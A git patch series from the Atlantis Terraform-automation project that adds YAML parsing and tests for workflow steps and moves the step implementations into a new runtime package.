@@ -502,7 +502,7 @@ workflows:
     apply:
       steps:
 `,
-			expOutput: yaml.RepoConfig{
+			expOutput: yaml.Config{
 				Version:  2,
 				Projects: basicProjects,
 				Workflows: map[string]yaml.Workflow{
@@ -534,7 +534,7 @@ workflows:
       - plan # we don't validate if they make sense
       - apply
 `,
-			expOutput: yaml.RepoConfig{
+			expOutput: yaml.Config{
 				Version:  2,
 				Projects: basicProjects,
 				Workflows: map[string]yaml.Workflow{
@@ -586,7 +586,7 @@ workflows:
       - apply:
           extra_args: ["a", "b"]
 `,
-			expOutput: yaml.RepoConfig{
+			expOutput: yaml.Config{
 				Version:  2,
 				Projects: basicProjects,
 				Workflows: map[string]yaml.Workflow{
@@ -634,7 +634,7 @@ workflows:
       steps:
       - run: echo apply "arg 2"
 `,
-			expOutput: yaml.RepoConfig{
+			expOutput: yaml.Config{
 				Version:  2,
 				Projects: basicProjects,
 				Workflows: map[string]yaml.Workflow{
diff --git a/server/events/yaml/stage.go b/server/events/yaml/stage.go
new file mode 100644
index 0000000000..7c84323b55
--- /dev/null
+++ b/server/events/yaml/stage.go
@@ -0,0 +1,5 @@
+package yaml
+
+type Stage struct {
+	Steps []StepConfig `yaml:"steps"` // can either be a built in step like 'plan' or a custom step like 'run: echo hi'
+}
diff --git a/server/events/yaml/step_config.go b/server/events/yaml/step_config.go
new file mode 100644
index 0000000000..f6e7713c0f
--- /dev/null
+++ b/server/events/yaml/step_config.go
@@ -0,0 +1,82 @@
+package yaml
+
+import (
+	"fmt"
+
+	"github.com/flynn-archive/go-shlex"
+	"github.com/pkg/errors"
+)
+
+type StepConfig struct {
+	StepType  string
+	ExtraArgs []string
+	// Run will be set if the StepType is "run". This is for custom commands.
+	// Ex. if the key is `run: echo hi` then Run will be "echo hi".
+	Run []string
+}
+
+func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	// First try to unmarshal as a single string, ex.
+	// steps:
+	// - init
+	// - plan
+	var singleString string
+	err := unmarshal(&singleString)
+	if err == nil {
+		if singleString != "init" && singleString != "plan" && singleString != "apply" {
+			return fmt.Errorf("unsupported step type: %q", singleString)
+		}
+		s.StepType = singleString
+		return nil
+	}
+
+	// This represents a step with extra_args, ex:
+	//   init:
+	//     extra_args: [a, b]
+	var step map[string]map[string][]string
+	if err = unmarshal(&step); err == nil {
+		if len(step) != 1 {
+			return errors.New("each step can have only one map key, you probably have something like:\nsteps:\n  - key1: val\n    key2: val")
+		}
+
+		for k, v := range step {
+			if k != "init" && k != "plan" && k != "apply" {
+				return fmt.Errorf("unsupported step %q", k)
+			}
+
+			extraArgs, ok := v["extra_args"]
+			if !ok {
+				return errors.New("the only supported key for a step is 'extra_args'")
+			}
+
+			s.StepType = k
+			s.ExtraArgs = extraArgs
+			return nil
+		}
+	}
+
+	// Try to unmarshal as a custom run step, ex.
+	// steps:
+	// - run: my command
+	var runStep map[string]string
+	if err = unmarshal(&runStep); err == nil {
+		if len(runStep) != 1 {
+			return errors.New("each step can have only one map key, you probably have something like:\nsteps:\n  - key1: val\n    key2: val")
+		}
+
+		for k, v := range runStep {
+			if k != "run" {
+				return fmt.Errorf("unsupported step %q", k)
+			}
+
+			s.StepType = "run"
+			parts, err := shlex.Split(v)
+			if err != nil {
+				return err
+			}
+			s.Run = parts
+		}
+	}
+
+	return err
+}
diff --git a/server/events/yaml/step_config_test.go b/server/events/yaml/step_config_test.go
new file mode 100644
index 0000000000..c75777ba53
--- /dev/null
+++ b/server/events/yaml/step_config_test.go
@@ -0,0 +1,159 @@
+package yaml_test
+
+import (
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/yaml"
+	. "github.com/runatlantis/atlantis/testing"
+	yamlv2 "gopkg.in/yaml.v2"
+)
+
+func TestStepConfig_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         yaml.StepConfig
+		expErr      string
+	}{
+
+		//Single string.
+		{
+			description: "should parse just init",
+			input:       `init`,
+			exp: yaml.StepConfig{
+				StepType: "init",
+			},
+		},
+		{
+			description: "should parse just plan",
+			input:       `plan`,
+			exp: yaml.StepConfig{
+				StepType: "plan",
+			},
+		},
+		{
+			description: "should parse just apply",
+			input:       `apply`,
+			exp: yaml.StepConfig{
+				StepType: "apply",
+			},
+		},
+
+		// With extra_args.
+		{
+			description: "should parse init with extra_args",
+			input: `
+init:
+  extra_args: [arg1, arg2]`,
+			exp: yaml.StepConfig{
+				StepType:  "init",
+				ExtraArgs: []string{"arg1", "arg2"},
+			},
+		},
+		{
+			description: "should parse plan with extra_args",
+			input: `
+plan:
+  extra_args: [arg1, arg2]`,
+			exp: yaml.StepConfig{
+				StepType:  "plan",
+				ExtraArgs: []string{"arg1", "arg2"},
+			},
+		},
+		{
+			description: "should parse apply with extra_args",
+			input: `
+apply:
+  extra_args: [arg1, arg2]`,
+			exp: yaml.StepConfig{
+				StepType:  "apply",
+				ExtraArgs: []string{"arg1", "arg2"},
+			},
+		},
+
+		// extra_args with non-strings.
+		{
+			description: "should convert non-string extra_args into strings",
+			input: `
+init:
+  extra_args: [1]`,
+			exp: yaml.StepConfig{
+				StepType:  "init",
+				ExtraArgs: []string{"1"},
+			},
+		},
+		{
+			description: "should convert non-string extra_args into strings",
+			input: `
+plan:
+  extra_args: [true]`,
+			exp: yaml.StepConfig{
+				StepType:  "plan",
+				ExtraArgs: []string{"true"},
+			},
+		},
+
+		// Custom run step.
+		{
+			description: "should allow for custom run steps",
+			input: `
+run: echo my command`,
+			exp: yaml.StepConfig{
+				StepType: "run",
+				Run:      []string{"echo", "my", "command"},
+			},
+		},
+		{
+			description: "should split words correctly in run step",
+			input: `
+run: echo 'my command'`,
+			exp: yaml.StepConfig{
+				StepType: "run",
+				Run:      []string{"echo", "my command"},
+			},
+		},
+
+		// Invalid steps
+		{
+			description: "should error when element is a map",
+			input: `
+key1: val
+key2: val`,
+			expErr: "each step can have only one map key, you probably have something like:\nsteps:\n  - key1: val\n    key2: val",
+		},
+		{
+			description: "should error when unrecognized step is used",
+			input: `
+invalid: val
+`,
+			expErr: "unsupported step \"invalid\"",
+		},
+		{
+			description: "should error when unrecognized step is used",
+			input: `
+invalid:
+  extra_args: []
+`,
+			expErr: "unsupported step \"invalid\"",
+		},
+		{
+			description: "should error when unrecognized step is used",
+			input: `
+run: []`,
+			expErr: "yaml: unmarshal errors:\n  line 2: cannot unmarshal !!seq into string",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var got yaml.StepConfig
+			err := yamlv2.Unmarshal([]byte(c.input), &got)
+			if c.expErr != "" {
+				ErrEquals(t, c.expErr, err)
+				return
+			}
+			Ok(t, err)
+			Equals(t, c.exp, got)
+		})
+	}
+}
diff --git a/server/events/yaml/workflow.go b/server/events/yaml/workflow.go
new file mode 100644
index 0000000000..97055cb3da
--- /dev/null
+++ b/server/events/yaml/workflow.go
@@ -0,0 +1,60 @@
+package yaml
+
+import "errors"
+
+type Workflow struct {
+	Apply *Stage `yaml:"apply"` // defaults to regular apply steps
+	Plan  *Stage `yaml:"plan"`  // defaults to regular plan steps
+}
+
+func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	// Check if they forgot to set the "steps" key and just started listing
+	// steps, ex.
+	//  plan:
+	//    - init
+	//    - plan
+	type MissingSteps struct {
+		Apply []interface{}
+		Plan  []interface{}
+	}
+	var missingSteps MissingSteps
+	// This will pass if they've just set the key to null, which we don't want
+	// since in that case we use the defaults to we also check if the len > 0.
+	if err := unmarshal(&missingSteps); err == nil && (len(missingSteps.Apply) > 0 || len(missingSteps.Plan) > 0) {
+		return errors.New("missing \"steps\" key")
+	}
+
+	// Use a type alias so unmarshal doesn't get into an infinite loop.
+	type alias Workflow
+	var tmp alias
+	if err := unmarshal(&tmp); err != nil {
+		return err
+	}
+	*p = Workflow(tmp)
+
+	// If plan or apply keys aren't specified we use the default workflow.
+	if p.Apply == nil {
+		p.Apply = &Stage{
+			[]StepConfig{
+				{
+					StepType: "apply",
+				},
+			},
+		}
+	}
+
+	if p.Plan == nil {
+		p.Plan = &Stage{
+			[]StepConfig{
+				{
+					StepType: "init",
+				},
+				{
+					StepType: "plan",
+				},
+			},
+		}
+	}
+
+	return nil
+}
diff --git a/server/events/yaml/workflow_test.go b/server/events/yaml/workflow_test.go
new file mode 100644
index 0000000000..dd299799e4
--- /dev/null
+++ b/server/events/yaml/workflow_test.go
@@ -0,0 +1,123 @@
+package yaml_test
+
+import (
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/yaml"
+	. "github.com/runatlantis/atlantis/testing"
+	yamlv2 "gopkg.in/yaml.v2"
+)
+
+func TestWorkflow_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         yaml.Workflow
+		expErr      string
+	}{
+		{
+			description: "should use defaults if set to null",
+			input:       `~`,
+			exp: yaml.Workflow{
+				Apply: &yaml.Stage{
+					Steps: []yaml.StepConfig{
+						{
+							StepType: "apply",
+						},
+					},
+				},
+				Plan: &yaml.Stage{
+					Steps: []yaml.StepConfig{
+						{
+							StepType: "init",
+						},
+						{
+							StepType: "plan",
+						},
+					},
+				},
+			},
+		},
+		{
+			description: "should use set values",
+			input: `
+plan:
+  steps:
+  - plan
+apply:
+  steps: []
+`,
+			exp: yaml.Workflow{
+				Apply: &yaml.Stage{
+					Steps: []yaml.StepConfig{},
+				},
+				Plan: &yaml.Stage{
+					Steps: []yaml.StepConfig{
+						{
+							StepType: "plan",
+						},
+					},
+				},
+			},
+		},
+		{
+			description: "should use defaults for apply if only plan set",
+			input: `
+plan:
+  steps: []`,
+			exp: yaml.Workflow{
+				Apply: &yaml.Stage{
+					Steps: []yaml.StepConfig{
+						{
+							StepType: "apply",
+						},
+					},
+				},
+				Plan: &yaml.Stage{
+					Steps: []yaml.StepConfig{},
+				},
+			},
+		},
+		{
+			description: "should use defaults for plan if only apply set",
+			input: `
+apply:
+  steps: []`,
+			exp: yaml.Workflow{
+				Apply: &yaml.Stage{
+					Steps: []yaml.StepConfig{},
+				},
+				Plan: &yaml.Stage{
+					Steps: []yaml.StepConfig{
+						{
+							StepType: "init",
+						},
+						{
+							StepType: "plan",
+						},
+					},
+				},
+			},
+		},
+		{
+			description: "should error if no steps key specified",
+			input: `
+apply:
+- apply`,
+			expErr: "missing \"steps\" key",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var w yaml.Workflow
+			err := yamlv2.Unmarshal([]byte(c.input), &w)
+			if c.expErr != "" {
+				ErrEquals(t, c.expErr, err)
+				return
+			}
+			Ok(t, err)
+			Equals(t, c.exp, w)
+		})
+	}
+}

From d6883e83e4a0aa90113cfe85b6a8452ce8aae94e Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 8 Jun 2018 16:36:04 +0100
Subject: [PATCH 15/69] Move runtime elements to the runtime package

---
 server/events/apply_executor.go               |   4 +-
 server/events/plan_executor.go                |   4 +-
 server/events/project_locker_test.go          |  42 ++--
 server/events/{yaml => runtime}/apply_step.go |   2 +-
 .../{yaml => runtime}/apply_step_test.go      |  16 +-
 .../{yaml => runtime}/execution_planner.go    |  23 +-
 server/events/{yaml => runtime}/init_step.go  |   2 +-
 .../{yaml => runtime}/init_step_test.go       |   8 +-
 server/events/{yaml => runtime}/plan_step.go  |   2 +-
 .../{yaml => runtime}/plan_step_test.go       |  28 +--
 server/events/{yaml => runtime}/repoconfig.go |   2 +-
 server/events/{yaml => runtime}/run_step.go   |   2 +-
 server/events/runtime/run_step_test.go        |   3 +
 server/events/runtime/runtime.go              |   4 +
 .../yaml/{reader.go => parser_validator.go}   |  31 ++-
 ...eader_test.go => parser_validator_test.go} | 208 ++----------------
 server/events/yaml/project.go                 |   4 +-
 server/events/yaml/run_step_test.go           |   3 -
 server/events/yaml/yaml.go                    |   4 +
 server/server.go                              |   5 +-
 20 files changed, 120 insertions(+), 277 deletions(-)
 rename server/events/{yaml => runtime}/apply_step.go (97%)
 rename server/events/{yaml => runtime}/apply_step_test.go (90%)
 rename server/events/{yaml => runtime}/execution_planner.go (93%)
 rename server/events/{yaml => runtime}/init_step.go (98%)
 rename server/events/{yaml => runtime}/init_step_test.go (92%)
 rename server/events/{yaml => runtime}/plan_step.go (99%)
 rename server/events/{yaml => runtime}/plan_step_test.go (96%)
 rename server/events/{yaml => runtime}/repoconfig.go (99%)
 rename server/events/{yaml => runtime}/run_step.go (97%)
 create mode 100644 server/events/runtime/run_step_test.go
 create mode 100644 server/events/runtime/runtime.go
 rename server/events/yaml/{reader.go => parser_validator.go} (59%)
 rename server/events/yaml/{reader_test.go => parser_validator_test.go} (71%)
 delete mode 100644 server/events/yaml/run_step_test.go
 create mode 100644 server/events/yaml/yaml.go

diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go
index 6562d8ab8e..dbacf35a64 100644
--- a/server/events/apply_executor.go
+++ b/server/events/apply_executor.go
@@ -16,10 +16,10 @@ package events
 import (
 	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/run"
+	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform"
 	"github.com/runatlantis/atlantis/server/events/vcs"
 	"github.com/runatlantis/atlantis/server/events/webhooks"
-	"github.com/runatlantis/atlantis/server/events/yaml"
 )
 
 // ApplyExecutor handles executing terraform apply.
@@ -31,7 +31,7 @@ type ApplyExecutor struct {
 	AtlantisWorkspace AtlantisWorkspace
 	ProjectLocker     *DefaultProjectLocker
 	Webhooks          webhooks.Sender
-	ExecutionPlanner  *yaml.ExecutionPlanner
+	ExecutionPlanner  *runtime.ExecutionPlanner
 }
 
 // Execute executes apply for the ctx.
diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go
index a620f2cb43..7e92917551 100644
--- a/server/events/plan_executor.go
+++ b/server/events/plan_executor.go
@@ -19,9 +19,9 @@ import (
 	"github.com/runatlantis/atlantis/server/events/locking"
 	"github.com/runatlantis/atlantis/server/events/models"
 	"github.com/runatlantis/atlantis/server/events/run"
+	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform"
 	"github.com/runatlantis/atlantis/server/events/vcs"
-	"github.com/runatlantis/atlantis/server/events/yaml"
 )
 
 //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator
@@ -39,7 +39,7 @@ type PlanExecutor struct {
 	Workspace        AtlantisWorkspace
 	ProjectFinder    ProjectFinder
 	ProjectLocker    ProjectLocker
-	ExecutionPlanner *yaml.ExecutionPlanner
+	ExecutionPlanner *runtime.ExecutionPlanner
 	LockURLGenerator LockURLGenerator
 }
 
diff --git a/server/events/project_locker_test.go b/server/events/project_locker_test.go
index fd95503487..cd6c80d91a 100644
--- a/server/events/project_locker_test.go
+++ b/server/events/project_locker_test.go
@@ -55,8 +55,8 @@ package events_test
 //	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
 //		LockAcquired: true,
 //	}, nil)
-//	When(p.ConfigReader.Exists("")).ThenReturn(true)
-//	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err"))
+//	When(p.ParserValidator.Exists("")).ThenReturn(true)
+//	When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err"))
 //
 //	res := p.Execute(&ctx, "", project)
 //	Equals(t, "err", res.ProjectResult.Error.Error())
@@ -68,8 +68,8 @@ package events_test
 //	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
 //		LockAcquired: true,
 //	}, nil)
-//	When(p.ConfigReader.Exists("")).ThenReturn(true)
-//	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
+//	When(p.ParserValidator.Exists("")).ThenReturn(true)
+//	When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{
 //		PreInit: []string{"pre-init"},
 //	}, nil)
 //	tfVersion, _ := version.NewVersion("0.9.0")
@@ -86,8 +86,8 @@ package events_test
 //	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
 //		LockAcquired: true,
 //	}, nil)
-//	When(p.ConfigReader.Exists("")).ThenReturn(true)
-//	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil)
+//	When(p.ParserValidator.Exists("")).ThenReturn(true)
+//	When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, nil)
 //	tfVersion, _ := version.NewVersion("0.9.0")
 //	When(tm.Version()).ThenReturn(tfVersion)
 //	When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err"))
@@ -102,8 +102,8 @@ package events_test
 //	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
 //		LockAcquired: true,
 //	}, nil)
-//	When(p.ConfigReader.Exists("")).ThenReturn(true)
-//	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
+//	When(p.ParserValidator.Exists("")).ThenReturn(true)
+//	When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{
 //		PreGet: []string{"pre-get"},
 //	}, nil)
 //	tfVersion, _ := version.NewVersion("0.8")
@@ -120,8 +120,8 @@ package events_test
 //	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
 //		LockAcquired: true,
 //	}, nil)
-//	When(p.ConfigReader.Exists("")).ThenReturn(true)
-//	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{}, nil)
+//	When(p.ParserValidator.Exists("")).ThenReturn(true)
+//	When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, nil)
 //	tfVersion, _ := version.NewVersion("0.8")
 //	When(tm.Version()).ThenReturn(tfVersion)
 //	When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err"))
@@ -136,8 +136,8 @@ package events_test
 //	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
 //		LockAcquired: true,
 //	}, nil)
-//	When(p.ConfigReader.Exists("")).ThenReturn(true)
-//	When(p.ConfigReader.Read("")).ThenReturn(events.ProjectConfig{
+//	When(p.ParserValidator.Exists("")).ThenReturn(true)
+//	When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{
 //		PrePlan: []string{"command"},
 //	}, nil)
 //	tfVersion, _ := version.NewVersion("0.9")
@@ -156,11 +156,11 @@ package events_test
 //		LockAcquired: true,
 //	}
 //	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
-//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	When(p.ParserValidator.Exists("")).ThenReturn(true)
 //	config := events.ProjectConfig{
 //		PreInit: []string{"pre-init"},
 //	}
-//	When(p.ConfigReader.Read("")).ThenReturn(config, nil)
+//	When(p.ParserValidator.Read("")).ThenReturn(config, nil)
 //	tfVersion, _ := version.NewVersion("0.9")
 //	When(tm.Version()).ThenReturn(tfVersion)
 //	When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil)
@@ -182,11 +182,11 @@ package events_test
 //		LockAcquired: true,
 //	}
 //	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
-//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	When(p.ParserValidator.Exists("")).ThenReturn(true)
 //	config := events.ProjectConfig{
 //		PreGet: []string{"pre-get"},
 //	}
-//	When(p.ConfigReader.Read("")).ThenReturn(config, nil)
+//	When(p.ParserValidator.Read("")).ThenReturn(config, nil)
 //	tfVersion, _ := version.NewVersion("0.8")
 //	When(tm.Version()).ThenReturn(tfVersion)
 //
@@ -207,11 +207,11 @@ package events_test
 //		LockAcquired: true,
 //	}
 //	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
-//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	When(p.ParserValidator.Exists("")).ThenReturn(true)
 //	config := events.ProjectConfig{
 //		PrePlan: []string{"command"},
 //	}
-//	When(p.ConfigReader.Read("")).ThenReturn(config, nil)
+//	When(p.ParserValidator.Read("")).ThenReturn(config, nil)
 //	tfVersion, _ := version.NewVersion("0.9")
 //	When(tm.Version()).ThenReturn(tfVersion)
 //
@@ -231,11 +231,11 @@ package events_test
 //		LockAcquired: true,
 //	}
 //	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
-//	When(p.ConfigReader.Exists("")).ThenReturn(true)
+//	When(p.ParserValidator.Exists("")).ThenReturn(true)
 //	config := events.ProjectConfig{
 //		PreApply: []string{"command"},
 //	}
-//	When(p.ConfigReader.Read("")).ThenReturn(config, nil)
+//	When(p.ParserValidator.Read("")).ThenReturn(config, nil)
 //	tfVersion, _ := version.NewVersion("0.9")
 //	When(tm.Version()).ThenReturn(tfVersion)
 //
@@ -262,7 +262,7 @@ package events_test
 //	r := rmocks.NewMockRunner()
 //	return &events.DefaultProjectLocker{
 //		Locker:       l,
-//		ConfigReader: cr,
+//		ParserValidator: cr,
 //		Terraform:    tm,
 //		Run:          r,
 //	}, l, tm, r
diff --git a/server/events/yaml/apply_step.go b/server/events/runtime/apply_step.go
similarity index 97%
rename from server/events/yaml/apply_step.go
rename to server/events/runtime/apply_step.go
index 4b6a360612..3591414815 100644
--- a/server/events/yaml/apply_step.go
+++ b/server/events/runtime/apply_step.go
@@ -1,4 +1,4 @@
-package yaml
+package runtime
 
 import (
 	"fmt"
diff --git a/server/events/yaml/apply_step_test.go b/server/events/runtime/apply_step_test.go
similarity index 90%
rename from server/events/yaml/apply_step_test.go
rename to server/events/runtime/apply_step_test.go
index f2066140e2..862f5e10e5 100644
--- a/server/events/yaml/apply_step_test.go
+++ b/server/events/runtime/apply_step_test.go
@@ -1,4 +1,4 @@
-package yaml_test
+package runtime_test
 
 import (
 	"io/ioutil"
@@ -9,14 +9,14 @@ import (
 	. "github.com/petergtz/pegomock"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
-	"github.com/runatlantis/atlantis/server/events/yaml"
 	. "github.com/runatlantis/atlantis/testing"
 )
 
 func TestRun_NoDir(t *testing.T) {
-	s := yaml.ApplyStep{
-		Meta: yaml.StepMeta{
+	s := runtime.ApplyStep{
+		Meta: runtime.StepMeta{
 			Workspace:             "workspace",
 			AbsolutePath:          "nonexistent/path",
 			DirRelativeToRepoRoot: ".",
@@ -33,8 +33,8 @@ func TestRun_NoPlanFile(t *testing.T) {
 	tmpDir, cleanup := TempDir(t)
 	defer cleanup()
 
-	s := yaml.ApplyStep{
-		Meta: yaml.StepMeta{
+	s := runtime.ApplyStep{
+		Meta: runtime.StepMeta{
 			Workspace:             "workspace",
 			AbsolutePath:          tmpDir,
 			DirRelativeToRepoRoot: ".",
@@ -58,8 +58,8 @@ func TestRun_Success(t *testing.T) {
 	terraform := mocks.NewMockClient()
 
 	tfVersion, _ := version.NewVersion("0.11.4")
-	s := yaml.ApplyStep{
-		Meta: yaml.StepMeta{
+	s := runtime.ApplyStep{
+		Meta: runtime.StepMeta{
 			Workspace:             "workspace",
 			AbsolutePath:          tmpDir,
 			DirRelativeToRepoRoot: ".",
diff --git a/server/events/yaml/execution_planner.go b/server/events/runtime/execution_planner.go
similarity index 93%
rename from server/events/yaml/execution_planner.go
rename to server/events/runtime/execution_planner.go
index c349034004..012d6b008d 100644
--- a/server/events/yaml/execution_planner.go
+++ b/server/events/runtime/execution_planner.go
@@ -1,17 +1,23 @@
-package yaml
+package runtime
 
 import (
 	"fmt"
+	"os"
 	"path/filepath"
 
 	"github.com/hashicorp/go-version"
+	"github.com/runatlantis/atlantis/server/events/yaml"
 	"github.com/runatlantis/atlantis/server/logging"
 )
 
+const PlanStageName = "plan"
+const ApplyStageName = "apply"
+const AtlantisYAMLFilename = "atlantis.yaml"
+
 type ExecutionPlanner struct {
 	TerraformExecutor TerraformExec
 	DefaultTFVersion  *version.Version
-	ConfigReader      *Reader
+	ParserValidator   *yaml.ParserValidator
 }
 
 type TerraformExec interface {
@@ -30,17 +36,18 @@ func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir str
 }
 
 func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []Step) ([]Step, error) {
-	config, err := s.ConfigReader.ReadConfig(repoDir)
-	if err != nil {
-		return nil, err
-	}
+	config, err := s.ParserValidator.ReadConfig(repoDir)
 
 	// If there's no config file, use defaults.
-	if config == nil {
+	if os.IsNotExist(err) {
 		log.Info("no %s file found––continuing with defaults", AtlantisYAMLFilename)
 		return defaults, nil
 	}
 
+	if err != nil {
+		return nil, err
+	}
+
 	// Get this project's configuration.
 	for _, p := range config.Projects {
 		if p.Dir == relProjectPath && p.Workspace == workspace {
@@ -61,7 +68,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 			// We have a workflow defined, so now we need to build it.
 			meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
 			var steps []Step
-			var stepsConfig []StepConfig
+			var stepsConfig []yaml.StepConfig
 			if stageName == PlanStageName {
 				stepsConfig = workflow.Plan.Steps
 			} else {
diff --git a/server/events/yaml/init_step.go b/server/events/runtime/init_step.go
similarity index 98%
rename from server/events/yaml/init_step.go
rename to server/events/runtime/init_step.go
index 235b90244e..1bf5b8734d 100644
--- a/server/events/yaml/init_step.go
+++ b/server/events/runtime/init_step.go
@@ -1,4 +1,4 @@
-package yaml
+package runtime
 
 // InitStep runs `terraform init`.
 type InitStep struct {
diff --git a/server/events/yaml/init_step_test.go b/server/events/runtime/init_step_test.go
similarity index 92%
rename from server/events/yaml/init_step_test.go
rename to server/events/runtime/init_step_test.go
index bfdbd84b5f..911bcb2330 100644
--- a/server/events/yaml/init_step_test.go
+++ b/server/events/runtime/init_step_test.go
@@ -1,4 +1,4 @@
-package yaml_test
+package runtime_test
 
 import (
 	"testing"
@@ -7,8 +7,8 @@ import (
 	. "github.com/petergtz/pegomock"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
-	"github.com/runatlantis/atlantis/server/events/yaml"
 	"github.com/runatlantis/atlantis/server/logging"
 	. "github.com/runatlantis/atlantis/testing"
 )
@@ -43,8 +43,8 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) {
 
 			tfVersion, _ := version.NewVersion(c.version)
 			logger := logging.NewNoopLogger()
-			s := yaml.InitStep{
-				Meta: yaml.StepMeta{
+			s := runtime.InitStep{
+				Meta: runtime.StepMeta{
 					Log:                   logger,
 					Workspace:             "workspace",
 					AbsolutePath:          "/path",
diff --git a/server/events/yaml/plan_step.go b/server/events/runtime/plan_step.go
similarity index 99%
rename from server/events/yaml/plan_step.go
rename to server/events/runtime/plan_step.go
index 99890e62ea..b8d6b3acee 100644
--- a/server/events/yaml/plan_step.go
+++ b/server/events/runtime/plan_step.go
@@ -1,4 +1,4 @@
-package yaml
+package runtime
 
 import (
 	"fmt"
diff --git a/server/events/yaml/plan_step_test.go b/server/events/runtime/plan_step_test.go
similarity index 96%
rename from server/events/yaml/plan_step_test.go
rename to server/events/runtime/plan_step_test.go
index 91e9372d37..53b45c2e64 100644
--- a/server/events/yaml/plan_step_test.go
+++ b/server/events/runtime/plan_step_test.go
@@ -1,4 +1,4 @@
-package yaml_test
+package runtime_test
 
 import (
 	"errors"
@@ -11,8 +11,8 @@ import (
 	. "github.com/petergtz/pegomock"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
-	"github.com/runatlantis/atlantis/server/events/yaml"
 	"github.com/runatlantis/atlantis/server/logging"
 	. "github.com/runatlantis/atlantis/testing"
 )
@@ -25,8 +25,8 @@ func TestRun_NoWorkspaceIn08(t *testing.T) {
 	tfVersion, _ := version.NewVersion("0.8")
 	logger := logging.NewNoopLogger()
 	workspace := "default"
-	s := yaml.PlanStep{
-		Meta: yaml.StepMeta{
+	s := runtime.PlanStep{
+		Meta: runtime.StepMeta{
 			Log:                   logger,
 			Workspace:             workspace,
 			AbsolutePath:          "/path",
@@ -61,8 +61,8 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) {
 	tfVersion, _ := version.NewVersion("0.8")
 	logger := logging.NewNoopLogger()
 	workspace := "notdefault"
-	s := yaml.PlanStep{
-		Meta: yaml.StepMeta{
+	s := runtime.PlanStep{
+		Meta: runtime.StepMeta{
 			Log:                   logger,
 			Workspace:             workspace,
 			AbsolutePath:          "/path",
@@ -112,8 +112,8 @@ func TestRun_SwitchesWorkspace(t *testing.T) {
 
 			tfVersion, _ := version.NewVersion(c.tfVersion)
 			logger := logging.NewNoopLogger()
-			s := yaml.PlanStep{
-				Meta: yaml.StepMeta{
+			s := runtime.PlanStep{
+				Meta: runtime.StepMeta{
 					Log:                   logger,
 					Workspace:             "workspace",
 					AbsolutePath:          "/path",
